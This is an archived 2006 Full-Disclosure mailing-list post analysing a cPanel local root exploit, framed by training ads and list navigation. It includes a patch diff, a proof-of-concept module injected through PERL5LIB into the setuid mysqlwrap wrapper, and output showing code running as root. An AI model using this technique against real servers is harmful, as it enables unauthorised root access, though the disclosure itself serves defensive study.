Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] cpanel exploit

from [cp haquer] Network Security [Permanent Link]
Subject: [Full-disclosure] cpanel exploit
Date: Sat, 30 Sep 2006 13:48:32 -0500 
It was pretty easy to figure out how the exploit worked once you saw their
first attempt at fixing it.

--- /usr/local/cpanel/bin/mysqladmin    2006-08-29 16:54:07.000000000 -0500
+++ httpupdate.cpanel.net/cpanelsync/EDGE/bin/mysqladmin        2006-09-23
23:51:20.000000000 -0500
@@ -5,9 +5,14 @@
# This code is subject to the cpanel license. Unauthorized copying is
prohibited

BEGIN {
-    push( @INC, "/usr/local/cpanel" );
+    unshift( @INC, "/usr/local/cpanel" );
+    @INC=grep(!/^\./,@INC);
+
@INC=grep(/^(\/usr\/lib\/perl|\/usr\/local\/lib\/perl|\/usr\/local\/cpanel)/,@INC);
+
}

So obviously the exploit involves inserting things into @INC when this
script is ran as root.  So, how is this script ran as root?

lrwxrwxrwx    1 root     root  /usr/local/cpanel/bin/mysqlwrap -> cpwrap*
-rwsr-xr-x    1 root     wheel /usr/local/cpanel/bin/cpwrap*

Through the setuid program mysqlwrap of course!  So the only quesiton is how
to insert things into @INC.  There are 2 ways that I could find, a command
line argument to perl, or the PERL5LIB environment variable.  Obviously, the
PERL5LIB environment variable seems like a good bet.


domainc@domain.com [~]# cat ~/OMGWTFLOL/strict.pm
die("my id is $<\n");
domainc@domain.com [~]# PERL5LIB=/home/domainc/OMGWTFLOL
/usr/local/cpanel/bin/mysqlwrap ADDDB
<b>Database Created</b><br>
Added the database .
my id is 0
Compilation failed in require at /usr/local/cpanel/Cpanel/Version.pm line 8.
BEGIN failed--compilation aborted at /usr/local/cpanel/Cpanel/Version.pm
line 8.Compilation failed in require at /usr/local/cpanel/bin/mysqladmin
line 11.
BEGIN failed--compilation aborted at /usr/local/cpanel/bin/mysqladmin line
11.



Smart readers will realize that the above patch is pretty stupid attempt at
stopping the exploit.  Several hosting companies with hacked servers had to
intervene to make sure cPanel fixed it correctly.  In new verisons of
cPanel, cpwrap now appears to clean out environment variables before
executing things.  But don't worry, there are several local root exploits
all over cPanel waiting to be discovered.  I have discovered 2 more on the
same day that I discovered how this one works.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: [Full-disclosure] Security Rss Feeds, Paul Schmehl
Next by Date:  Re: [Full-disclosure] Security Rss Feeds, Peter Dawson
Previous by Thread:  Re: [Full-disclosure] cpanel exploit, Rob Lemos
Next by Thread:  [Full-disclosure] Announce: RFDIOt v0.1e released, Adam Laurie
Indexes:  [Date] [Thread] [Top] [All Lists]